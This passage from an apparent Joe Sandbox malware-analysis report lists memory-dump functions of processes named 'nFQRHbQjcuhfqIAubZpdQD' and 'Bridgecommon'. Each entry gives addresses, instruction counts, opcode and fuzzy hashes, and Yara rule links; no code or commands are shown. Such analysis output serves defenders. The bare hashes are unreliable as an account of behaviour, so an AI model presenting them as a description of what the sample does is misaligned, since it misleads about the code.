                                                                                              • Instruction ID: f5436f674f61b8b3f0a8ba98803e38d6917cbd32951df878bb7bd0d25afaf1b3
                                                                                              • Opcode Fuzzy Hash: 1e396450e401a0517b295cfef68c6400db2cb7bd37b0803242d2fd2ddaba9c3e
                                                                                              • Instruction Fuzzy Hash: 06E01A7054E3C04FCB0AAB7488699447FB0AE6B21078F41DEC089CF1B3D62D8949C701
                                                                                              Function 00007FFD9BAED459 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1387fcec16532dca8b83936e9c218a1de773a226c272e265f769312568319901
                                                                                              • Instruction ID: 66020add315756dc11797e7c61ae317818277d6829c0c55a604dfb3ca7abd1c6
                                                                                              • Opcode Fuzzy Hash: 1387fcec16532dca8b83936e9c218a1de773a226c272e265f769312568319901
                                                                                              • Instruction Fuzzy Hash: A5E04F2194B3C04FC70B973588A88907F60DE1721078A41EAC045CF2B3E92A8849C701
                                                                                              Function 00007FFD9BAEA050 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                              Function 00007FFD9BAEA0E0 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                              Function 00007FFD9BAB2AD5 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction ID: ccb4013efbf6993cff1f18f13554963fe7b665062b8ed2367999b6ef2223c7a1
                                                                                              • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction Fuzzy Hash: 0FE01230E0D12A46FBB49754D8617F962A0DB54300F1110B8D51E933D1DD78AF818E49
                                                                                              Function 00007FFD9BAE7489 Relevance: .0, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d4d612bdee4e9b3942abfefd85f88e96438979829e0b5e7ce542c0d736fb19eb
                                                                                              • Instruction ID: 14a5df854d20b8acbba59f3fa79852746daf9461e620274be716485c1fb1e0f4
                                                                                              • Opcode Fuzzy Hash: d4d612bdee4e9b3942abfefd85f88e96438979829e0b5e7ce542c0d736fb19eb
                                                                                              • Instruction Fuzzy Hash: 0AE01A2294E7C04FC70B9B3488698507F609E1721078A40EBC085CF1B3EA299D49C711
                                                                                              Function 00007FFD9BAED4D9 Relevance: .0, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 995cfa23e97c24a89e95c1354cbe138a12b2eafcb155955bc41c9bae52be8a71
                                                                                              • Instruction ID: ae6debb303e3b3b964d4e5d3413eb0c528cd42d062670cc55ccb8cf0c0af4636
                                                                                              • Opcode Fuzzy Hash: 995cfa23e97c24a89e95c1354cbe138a12b2eafcb155955bc41c9bae52be8a71
                                                                                              • Instruction Fuzzy Hash: E6E04F2294F7C04FC71B973588799507F60DF6721078A40EEC085CF5B3D9199849C712
                                                                                              Function 00007FFD9BAE1C90 Relevance: .0, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                              Function 00007FFD9BAEB388 Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                              • Instruction ID: 291b8ced02b68f7b0bc2655a57fe85cf2fa4149a7b6fbf77b45826acde0dadb2
                                                                                              • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                              • Instruction Fuzzy Hash: F6D02230B518040FC70CA738885883033A0EB6A20678100A8D00AC72B1D96AEC88C780
                                                                                              Function 00007FFD9BAE6A90 Relevance: .0, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bae1000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                                              • Instruction ID: cdef417d687f32aeac554908b6b620d6a77e6b49519d4cd35ae4cca668a37729
                                                                                              • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                                              • Instruction Fuzzy Hash: 6FD02230B548040FC70CA738885C8303390EB6A2167C100A8D00AC72B1E96ADC88C740
                                                                                              Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction ID: 713134b87c52066abafe22df5a3b0f9000d6f810c223d6d783dd219e3f7e1076
                                                                                              • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction Fuzzy Hash: 7CC04C05F5B53F01F43577EF54760ACB1409BD5A10FD70176D52D800E19CED26D5495E
                                                                                              Function 00007FFD9BAB1310 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction ID: 6a8a9a6bf83a003ca13e4a08532d72422746f823f0dda13da2124eca4c4eed35
                                                                                              • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction Fuzzy Hash: E8C08C3051180C8FC908EB28C88480433A0FB09300BC20090E009C7270E65ADDC2CB40
                                                                                              Function 00007FFD9BAC685C Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3a94d5982387b57a133a12997876bda7df39e37f70f18a2077d23d642e577c25
                                                                                              • Instruction ID: 8fe7887295c5b5ffaec6f3abcc4684739fe732c2edc0758e506b00f2a400de5e
                                                                                              • Opcode Fuzzy Hash: 3a94d5982387b57a133a12997876bda7df39e37f70f18a2077d23d642e577c25
                                                                                              • Instruction Fuzzy Hash: D4D0C930D045298FDBA0EB5488917A876B1AF48310F5001F6800CE3285CE356D80DB51
                                                                                              Function 00007FFD9BAB4E17 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction ID: 03d477ccb4175055202313fbebcd53292deebeac5553f9cd479d896b3342e71a
                                                                                              • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction Fuzzy Hash: 97C08CA1E2822945E37486A0482A1AA73818F01220F6286B2806DA70A1EE6896426A80
                                                                                              Function 00007FFD9BAB2555 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d8e3dd90adc7a7bd89bbdb057cdeb953dd505ec69db4469dc38f7dcee209e240
                                                                                              • Instruction ID: 08665333b9085a4f1aed96d45f04d0e13d56d9190c4b13bbcc5372a398322bec
                                                                                              • Opcode Fuzzy Hash: d8e3dd90adc7a7bd89bbdb057cdeb953dd505ec69db4469dc38f7dcee209e240
                                                                                              • Instruction Fuzzy Hash: AAC04C01F2882A07F399661844315BE08835F54769F5546B8E01ECB6DECD5C5A621BC7
                                                                                              Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction ID: 3c7e3ebd94f208d2fcbfa463022b6d09dde85837b0625a7963d51f888e9b4b46
                                                                                              • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction Fuzzy Hash: E9B01200E5741F00E43433FB08B20A870409B44100FC20070D41D8009198DD16940646

                                                                                              Non-executed Functions

                                                                                              Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000038.00000002.2889938688.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_56_2_7ffd9bab0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              • Opcode ID: 64295ce63d89b9c75ab817259eb6315a6be831e1ddee33239c49bc918e967d57
                                                                                              • Instruction ID: ee0e26a1e1c57ffd8ab351f7d2016590dd2b112039a0fad7042e754bedb5fd9d
                                                                                              • Opcode Fuzzy Hash: 64295ce63d89b9c75ab817259eb6315a6be831e1ddee33239c49bc918e967d57
                                                                                              • Instruction Fuzzy Hash: DB41AE07B0953646E23973FD78229ED5B848FA927FB0847B7F56E8D0D74C486081C2E9

                                                                                              Executed Functions

                                                                                              Function 00007FFD9BAE09AC Relevance: 1.6, Instructions: 1644COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 74fe736cc652e0d3423dcd026ed316de8c1524f82fede36c67e5679deda8c8e9
                                                                                              • Instruction ID: 369026df5ab6341964dbaeb2816e708beac86ec19edf2bdc6fbabbb0855af056
                                                                                              • Opcode Fuzzy Hash: 74fe736cc652e0d3423dcd026ed316de8c1524f82fede36c67e5679deda8c8e9
                                                                                              • Instruction Fuzzy Hash: 1EC2B331B1991E4FEBA8EB5884A1AB873D2FFA8350F0542B9D01DC72D7DD68AD418781
                                                                                              Function 00007FFD9BB01000 Relevance: .4, Instructions: 400COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b5c3d35d984437ce1bc6d3cddcc3e668dae44c3eb67e690c45d144b4ddbfd214
                                                                                              • Instruction ID: be485565a8a165dcd51c330d823bc9851601e97c8507e311e1d5b29538752261
                                                                                              • Opcode Fuzzy Hash: b5c3d35d984437ce1bc6d3cddcc3e668dae44c3eb67e690c45d144b4ddbfd214
                                                                                              • Instruction Fuzzy Hash: 8EB17C21B6D79A0BE32D8A6C48920B573C1FB9330DB15877DE8DBC359BD928E50786C1
                                                                                              Function 00007FFD9BAD0D78 Relevance: .3, Instructions: 257COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b64a4818c29080e439505db85a973e26cd9aa43b45af74a1be8c34fbeecfe78f
                                                                                              • Instruction ID: d004bf825a64333a87d76a5a227fffb6d4faa991b51f384a6558d82e0f8dd3af
                                                                                              • Opcode Fuzzy Hash: b64a4818c29080e439505db85a973e26cd9aa43b45af74a1be8c34fbeecfe78f
                                                                                              • Instruction Fuzzy Hash: 9E91C172A19A8D4FE799DB6888657A97FE0FF99714F0002BED04DC72E6CBB81405C741
                                                                                              Function 00007FFD9BAFA59E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: [
                                                                                              • API String ID: 0-784033777
                                                                                              • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                                              • Instruction ID: bbf7a2260f85285b4908543e04c03b12b0e80d2114a3353d194ffcbe533aaa0c
                                                                                              • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                                              • Instruction Fuzzy Hash: F3119431A1CB588FDB64DF18C4456AABBE1FB98711F12053ED489E3270CB74B9418B83
                                                                                              Function 00007FFD9BB01B38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: bfbefb590432468084fd49266a04cd45f1a3350012849f0dde65ead55788496e
                                                                                              • Instruction ID: 9d4c664d71cd1ef77a1365299136f9f7734d95e4671a2bb8773e28da2f205024
                                                                                              • Opcode Fuzzy Hash: bfbefb590432468084fd49266a04cd45f1a3350012849f0dde65ead55788496e
                                                                                              • Instruction Fuzzy Hash: 9D11BF2150F3C54FDB57977488289A97FA0AF43615B0A81EEE0C5CF0F3DA69494AC712
                                                                                              Function 00007FFD9BB0AC83 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C7
                                                                                              • API String ID: 0-2279091541
                                                                                              • Opcode ID: b5219737a51c0bb0ea60b40a091dddaf5cff3d128efa6edc09942b153dd09312
                                                                                              • Instruction ID: 0eb7c3f59ac615d02c5e0b99a616d93979dbde950ce93ab4f8c887cdbe014959
                                                                                              • Opcode Fuzzy Hash: b5219737a51c0bb0ea60b40a091dddaf5cff3d128efa6edc09942b153dd09312
                                                                                              • Instruction Fuzzy Hash: 86F0B421B0A90E4FE6A8E75848EA7B862C2FF98319F054076E04CC72E7DE2869814341
                                                                                              Function 00007FFD9BB0A039 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: f64fda5e2a283c5a6f20f5bc460977e2c33a95fab3921efa84f9000537be349d
                                                                                              • Instruction ID: afbd80f9ef0ad0fad0cf1b735c2b400d77d19183b0cef39e93db4313243bea19
                                                                                              • Opcode Fuzzy Hash: f64fda5e2a283c5a6f20f5bc460977e2c33a95fab3921efa84f9000537be349d
                                                                                              • Instruction Fuzzy Hash: 1FE06D6164E7C84FC71AEA748869554BFA0EF6721174A42EFC085CF5A7EA2D8885C701
                                                                                              Function 00007FFD9BB02E49 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 6164b1069710f8b3b52f48148b439a8276ab5531142d88090189c8fbc13049d9
                                                                                              • Instruction ID: 3d62a0c47176d44997c82c0e1f821f8ab33fecd675541abfaf393db1c4301b03
                                                                                              • Opcode Fuzzy Hash: 6164b1069710f8b3b52f48148b439a8276ab5531142d88090189c8fbc13049d9
                                                                                              • Instruction Fuzzy Hash: F8E06D6164E7C44FCB1AEA758869454BFA0EF6720174A52EEC085CF5A7EA2D8889C701
                                                                                              Function 00007FFD9BB0A0C9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 1180c0164a1678c14bbd07de09373b86f6d47de75d9a1041d2375b4828baaeea
                                                                                              • Instruction ID: 89b5110806269fea2bc7528639372eea444baea11129436563572e6916387cf4
                                                                                              • Opcode Fuzzy Hash: 1180c0164a1678c14bbd07de09373b86f6d47de75d9a1041d2375b4828baaeea
                                                                                              • Instruction Fuzzy Hash: 81E09271A0E3C44FC71AEB3488688547F60EE6B21134A42EFC045CF2A7EA2DCC85C701
                                                                                              Function 00007FFD9BAF57D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 54c471381a3eb1387d9f847047a2259f9ccba084ab570ea0abc02eeeae4831dc
                                                                                              • Instruction ID: 562fea6da422dd0b0147829fc312ee4a392a0f6b7824ed0102470070d6831f05
                                                                                              • Opcode Fuzzy Hash: 54c471381a3eb1387d9f847047a2259f9ccba084ab570ea0abc02eeeae4831dc
                                                                                              • Instruction Fuzzy Hash: 40E0923060A3C14FCB1AAB748468855BF70EF6720174A42EEC046CF1A3EB2DC886CB01
                                                                                              Function 00007FFD9BB0A589 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: I
                                                                                              • API String ID: 0-3707901625
                                                                                              • Opcode ID: fbe99245bd64b7fb1acc958f6fb56ff3235aea77a36e13d0b8fd2430e620f844
                                                                                              • Instruction ID: 8556a6a272a9f02e02275a8695d368f96026743ce7064ae58155c101c149d47b
                                                                                              • Opcode Fuzzy Hash: fbe99245bd64b7fb1acc958f6fb56ff3235aea77a36e13d0b8fd2430e620f844
                                                                                              • Instruction Fuzzy Hash: 1FE04F7194A3C44FCB16EB7484A58843F60DE6721078B40EEC145CF1B3E62D8849C701
                                                                                              Function 00007FFD9BAF9359 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: I
                                                                                              • API String ID: 0-3707901625
                                                                                              • Opcode ID: 0092ded93127deea18adf1d4c86615d31208ed26a7bdb0caad6650519258112c
